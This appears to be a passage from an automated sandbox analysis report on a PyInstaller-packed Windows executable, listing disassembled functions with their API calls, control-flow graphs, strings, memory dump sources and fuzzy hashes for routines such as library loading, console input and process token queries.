                                                                                                                                                                                                                                    Function 00007FF7B2B7ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7B2B7F0AA,?,?,-00000018,00007FF7B2B7AD53,?,?,?,00007FF7B2B7AC4A,?,?,?,00007FF7B2B75F3E), ref: 00007FF7B2B7EE8C
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7B2B7F0AA,?,?,-00000018,00007FF7B2B7AD53,?,?,?,00007FF7B2B7AC4A,?,?,?,00007FF7B2B75F3E), ref: 00007FF7B2B7EE98
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                    • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                    • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                    • Instruction ID: 30eefac5b35745a67b1a957fa5a0ed03e842d405244f33a7870cf7a1797b0eb3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E41F82171A60181EA57BB1E9804577A291BF6AB90FC84539DE1D873ACFEBCE406C321
                                                                                                                                                                                                                                    Function 00007FF7B2B636B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF7B2B63804), ref: 00007FF7B2B636E1
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B63804), ref: 00007FF7B2B636EB
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B62C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62C9E
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B62C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62D63
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B62C50: MessageBoxW.USER32 ref: 00007FF7B2B62D99
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                    • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                    • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                    • Instruction ID: 641b8400098f2f3acf4fcd732b4effddf6d016ed010af632c210c6f7a9a5f212
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5621B461B1A64240FA23BB28E8053B7E250BF66744FC44236D75DC65DDFEACE505C328
                                                                                                                                                                                                                                    Function 00007FF7B2B7BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 901 7ff7b2b7ba5c-7ff7b2b7ba82 902 7ff7b2b7ba9d-7ff7b2b7baa1 901->902 903 7ff7b2b7ba84-7ff7b2b7ba98 call 7ff7b2b74ee8 call 7ff7b2b74f08 901->903 904 7ff7b2b7be77-7ff7b2b7be83 call 7ff7b2b74ee8 call 7ff7b2b74f08 902->904 905 7ff7b2b7baa7-7ff7b2b7baae 902->905 917 7ff7b2b7be8e 903->917 924 7ff7b2b7be89 call 7ff7b2b7a8e0 904->924 905->904 907 7ff7b2b7bab4-7ff7b2b7bae2 905->907 907->904 910 7ff7b2b7bae8-7ff7b2b7baef 907->910 913 7ff7b2b7bb08-7ff7b2b7bb0b 910->913 914 7ff7b2b7baf1-7ff7b2b7bb03 call 7ff7b2b74ee8 call 7ff7b2b74f08 910->914 920 7ff7b2b7be73-7ff7b2b7be75 913->920 921 7ff7b2b7bb11-7ff7b2b7bb17 913->921 914->924 922 7ff7b2b7be91-7ff7b2b7bea8 917->922 920->922 921->920 925 7ff7b2b7bb1d-7ff7b2b7bb20 921->925 924->917 925->914 928 7ff7b2b7bb22-7ff7b2b7bb47 925->928 930 7ff7b2b7bb7a-7ff7b2b7bb81 928->930 931 7ff7b2b7bb49-7ff7b2b7bb4b 928->931 932 7ff7b2b7bb56-7ff7b2b7bb6d call 7ff7b2b74ee8 call 7ff7b2b74f08 call 7ff7b2b7a8e0 930->932 933 7ff7b2b7bb83-7ff7b2b7bbab call 7ff7b2b7d5fc call 7ff7b2b7a948 * 2 930->933 934 7ff7b2b7bb4d-7ff7b2b7bb54 931->934 935 7ff7b2b7bb72-7ff7b2b7bb78 931->935 963 7ff7b2b7bd00 932->963 966 7ff7b2b7bbad-7ff7b2b7bbc3 call 7ff7b2b74f08 call 7ff7b2b74ee8 933->966 967 7ff7b2b7bbc8-7ff7b2b7bbf3 call 7ff7b2b7c284 933->967 934->932 934->935 937 7ff7b2b7bbf8-7ff7b2b7bc0f 935->937 940 7ff7b2b7bc8a-7ff7b2b7bc94 call 7ff7b2b8391c 937->940 941 7ff7b2b7bc11-7ff7b2b7bc19 937->941 952 7ff7b2b7bd1e 940->952 953 7ff7b2b7bc9a-7ff7b2b7bcaf 940->953 941->940 945 7ff7b2b7bc1b-7ff7b2b7bc1d 941->945 945->940 949 7ff7b2b7bc1f-7ff7b2b7bc35 945->949 949->940 954 7ff7b2b7bc37-7ff7b2b7bc43 949->954 956 7ff7b2b7bd23-7ff7b2b7bd43 ReadFile 952->956 953->952 958 7ff7b2b7bcb1-7ff7b2b7bcc3 GetConsoleMode 953->958 954->940 959 7ff7b2b7bc45-7ff7b2b7bc47 954->959 961 7ff7b2b7be3d-7ff7b2b7be46 GetLastError 956->961 962 7ff7b2b7bd49-7ff7b2b7bd51 956->962 958->952 964 7ff7b2b7bcc5-7ff7b2b7bccd 958->964 959->940 965 7ff7b2b7bc49-7ff7b2b7bc61 959->965 972 7ff7b2b7be48-7ff7b2b7be5e call 7ff7b2b74f08 call 7ff7b2b74ee8 961->972 973 7ff7b2b7be63-7ff7b2b7be66 961->973 962->961 969 7ff7b2b7bd57 962->969 974 7ff7b2b7bd03-7ff7b2b7bd0d call 7ff7b2b7a948 963->974 964->956 971 7ff7b2b7bccf-7ff7b2b7bcf1 ReadConsoleW 964->971 965->940 975 7ff7b2b7bc63-7ff7b2b7bc6f 965->975 966->963 967->937 979 7ff7b2b7bd5e-7ff7b2b7bd73 969->979 981 7ff7b2b7bcf3 GetLastError 971->981 982 7ff7b2b7bd12-7ff7b2b7bd1c 971->982 972->963 976 7ff7b2b7be6c-7ff7b2b7be6e 973->976 977 7ff7b2b7bcf9-7ff7b2b7bcfb call 7ff7b2b74e7c 973->977 974->922 975->940 985 7ff7b2b7bc71-7ff7b2b7bc73 975->985 976->974 977->963 979->974 988 7ff7b2b7bd75-7ff7b2b7bd80 979->988 981->977 982->979 985->940 986 7ff7b2b7bc75-7ff7b2b7bc85 985->986 986->940 993 7ff7b2b7bda7-7ff7b2b7bdaf 988->993 994 7ff7b2b7bd82-7ff7b2b7bd9b call 7ff7b2b7b674 988->994 997 7ff7b2b7be2b-7ff7b2b7be38 call 7ff7b2b7b4b4 993->997 998 7ff7b2b7bdb1-7ff7b2b7bdc3 993->998 1001 7ff7b2b7bda0-7ff7b2b7bda2 994->1001 997->1001 1002 7ff7b2b7be1e-7ff7b2b7be26 998->1002 1003 7ff7b2b7bdc5 998->1003 1001->974 1002->974 1005 7ff7b2b7bdca-7ff7b2b7bdd1 1003->1005 1006 7ff7b2b7be0d-7ff7b2b7be18 1005->1006 1007 7ff7b2b7bdd3-7ff7b2b7bdd7 1005->1007 1006->1002 1008 7ff7b2b7bdd9-7ff7b2b7bde0 1007->1008 1009 7ff7b2b7bdf3 1007->1009 1008->1009 1011 7ff7b2b7bde2-7ff7b2b7bde6 1008->1011 1010 7ff7b2b7bdf9-7ff7b2b7be09 1009->1010 1010->1005 1013 7ff7b2b7be0b 1010->1013 1011->1009 1012 7ff7b2b7bde8-7ff7b2b7bdf1 1011->1012 1012->1010 1013->1002
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                    • Instruction ID: d02fc6633896ac90d382300f4ea824b33d28cd48348f4247507f146611441c55
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44C1D52290D68691E6627B1D90402BFF660EBA3B90FD54131EB4D077ADEEFCE445CB20
                                                                                                                                                                                                                                    Function 00007FF7B2B68570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 995526605-0
                                                                                                                                                                                                                                    • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                    • Instruction ID: c4c61c8401e5331d7924af190426d5a6140179d29da209a2eb848dfd01648c6b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95217821A0D64242DA12AB5DB44413BE3A0FF927A0F900635D76D876EDEEBCD449C710
                                                                                                                                                                                                                                    Function 00007FF7B2B690E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: GetCurrentProcess.KERNEL32 ref: 00007FF7B2B68590
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: OpenProcessToken.ADVAPI32 ref: 00007FF7B2B685A3
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: GetTokenInformation.KERNELBASE ref: 00007FF7B2B685C8
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: GetLastError.KERNEL32 ref: 00007FF7B2B685D2
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: GetTokenInformation.KERNELBASE ref: 00007FF7B2B68612
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7B2B6862E
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: CloseHandle.KERNEL32 ref: 00007FF7B2B68646
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00007FF7B2B63C55), ref: 00007FF7B2B6916C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00007FF7B2B63C55), ref: 00007FF7B2B69175
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                    • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                    • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                    • Instruction ID: a1c2d7425939e692418158c82e1be020349cd66edfe2a0c145be662581a439fe
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA218421A0A64241F612BB24E4192FBE260FFA6740FD44036EB4D8779AFFBCD845C760
                                                                                                                                                                                                                                    Function 00007FF7B2B67E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(00000000,?,00007FF7B2B6352C,?,00000000,00007FF7B2B63F23), ref: 00007FF7B2B67F32
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateDirectory
                                                                                                                                                                                                                                    • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                    • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                    • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                    • Instruction ID: 15aecafb24736590959e6cd368225bfc718b08f0bad3f72adcab04ac7a9c0af8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4131E92161AAC145FA23AB25E4107EBE254EBA5BE0F840231EB6D877CDFE6CD505C714
                                                                                                                                                                                                                                    Function 00007FF7B2B7CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B2B7CF4B), ref: 00007FF7B2B7D07C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B2B7CF4B), ref: 00007FF7B2B7D107
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 953036326-0
                                                                                                                                                                                                                                    • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                    • Instruction ID: ddf51081c67b943464c89e5e1c38c6015651a196fc8e1ce876ce878806332cab
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9691EB32F0A65245F752BF6D944027EA7A0BB667C4F944139DF0E57AA8EF78D482C320
                                                                                                                                                                                                                                    Function 00007FF7B2B7F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4170891091-0
                                                                                                                                                                                                                                    • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                    • Instruction ID: ad79662c188449106420c7160dcfa43e40c403a8dd79396cade1bcf8527360e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44513732F0611186EB15FF6C88556BEA761AF26358F90023ADF1D52BF9EF78A402C310
                                                                                                                                                                                                                                    Function 00007FF7B2B7577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2780335769-0
                                                                                                                                                                                                                                    • Opcode ID: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                                    • Instruction ID: 853517c2819e6cc1d8386f0a17bc09d206f202acd5d4a4e8436edd818eccc128
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C51B122E192418AF711EF78D4407BEB7A1AB69B58F504435DF1D4B6ACEF78E440C320
                                                                                                                                                                                                                                    Function 00007FF7B2B75628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1279662727-0
                                                                                                                                                                                                                                    • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                    • Instruction ID: 7e6c219194974e72dfe7dbbba2802fcb42d3b7fc586f99c5f515b68bc7f8998a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
